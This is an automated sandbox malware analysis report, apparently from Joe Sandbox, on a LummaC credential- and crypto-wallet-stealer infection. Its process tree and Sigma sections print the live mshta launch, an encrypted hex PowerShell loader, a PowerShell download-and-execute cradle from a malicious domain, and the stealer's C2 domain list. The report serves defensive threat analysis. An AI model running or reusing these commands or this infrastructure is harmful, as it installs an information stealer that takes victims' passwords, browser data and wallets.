Edit tour

Windows Analysis Report

Overview

General Information

Analysis ID:	1579348
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Powershell Download and Execute IEX

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected Powershell download and execute

.NET source code contains potential unpacker

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: PowerShell Download and Execution Cradles

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Yara detected Costura Assembly Loader

Yara detected MSILLoadEncryptedAssembly

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64native

cmd.exe (PID: 6992 cmdline: cmd /C ""C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

mshta.exe (PID: 2044 cmdline: "C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4 MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 2576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1047B4CA5F5C3136955E90288D0CF771D4EDB3C9D787D81A22FA1D19D50DBC83BC87F1DCA44B36AD85C9385793AFD75CBEBC74C6D267B19EA7B471F3AA348B616B1DBAA4A77832B7A57A91B94748F0F93B2D08F4BC95283A1D6EF07728C7091AF8F56E69DE9EA56CA801CD0A7E62F5CDFAE51540ACFCB025D5E940A9075C8DA17758CDC6A94DC6B6D01EB23E488BA9A1371F56D19500FE2B8FB10BA9B54801012917F04D36326F74A108C2D0B9AD4FB51DA2F8BA2777F37564F5B6B6E926E7121E3462FF03AAE5966558C3283C1548AC5074916DB8A685025AD4BB17E389AAE7C4C89FE3D49A5B7CBB890755B7CBC935D1185DE2AFF91099EC236AF765EB3039E9561D484E095F1874255D784C682A4B088C008559D9426482954EA469C7570756');$BIAG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((cDnCn('4C50475A727A72534D6D4F70764E7061')),[byte[]]::new(16)).TransformFinalBlock($Lhmk,0,$Lhmk.Length)); & $BIAG.Substring(0,3) $BIAG.Substring(129) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 8336 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 9160 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

chrome.exe (PID: 8056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" MD5: BB7C48CDDDE076E7EB44022520F40F77)

chrome.exe (PID: 8052 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2736,i,10947443874826805229,13044788209452126445,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["surmisehotte.click", "aspecteirs.lat", "energyaffai.lat", "crosshuaht.lat", "discokeyus.lat", "grannyejh.lat", "sustainskelet.lat", "rapeflowwj.lat", "necklacebudi.lat"], "Build id": "yJEcaG--singl6"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.57200410289.0000000008220000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: powershell.exe PID: 2576	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 2576	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x29a3a:$b1: ::WriteAllBytes( 0x2a3da:$b1: ::WriteAllBytes( 0xcba27:$b1: ::WriteAllBytes( 0xcbdcf:$b1: ::WriteAllBytes( 0x1699:$s1: -join 0x2557:$s1: -join 0x1c931:$s1: -join 0x1d687:$s1: -join 0x29aed:$s1: -join 0x2a48d:$s1: -join 0x40c42:$s1: -join 0x4d132:$s1: -join 0x4dff0:$s1: -join 0x519ee:$s1: -join 0x710d0:$s1: -join 0x71f8f:$s1: -join 0x73cbc:$s1: -join 0x75659:$s1: -join 0x9d53a:$s1: -join 0x9e48d:$s1: -join 0x9f35c:$s1: -join
Process Memory Space: powershell.exe PID: 8336	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 8336	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
Process Memory Space: powershell.exe PID: 8336	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x4c182:$b2: ::FromBase64String( 0xb975a4:$b2: ::FromBase64String( 0x45f96:$s1: -join 0x4bf8b:$s1: -join 0xb00ced:$s1: -join 0xb0ddc2:$s1: -join 0xb11194:$s1: -join 0xb11846:$s1: -join 0xb13337:$s1: -join 0xb1553d:$s1: -join 0xb15d64:$s1: -join 0xb165d4:$s1: -join 0xb16d0f:$s1: -join 0xb16d41:$s1: -join 0xb16d89:$s1: -join 0xb16da8:$s1: -join 0xb175f8:$s1: -join 0xb17774:$s1: -join 0xb177ec:$s1: -join 0xb1787f:$s1: -join 0xb17ae5:$s1: -join
Process Memory Space: powershell.exe PID: 9160	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: powershell.exe PID: 9160	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: powershell.exe PID: 9160	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.powershell.exe.8220000.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi32_2576.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_8336.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell Download and Execution Cradles

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C343E27EEC5C4191D27011B33568FE6B0ECE385FE81FF1

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D1272

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 9160, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 8056, ProcessName: chrome.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9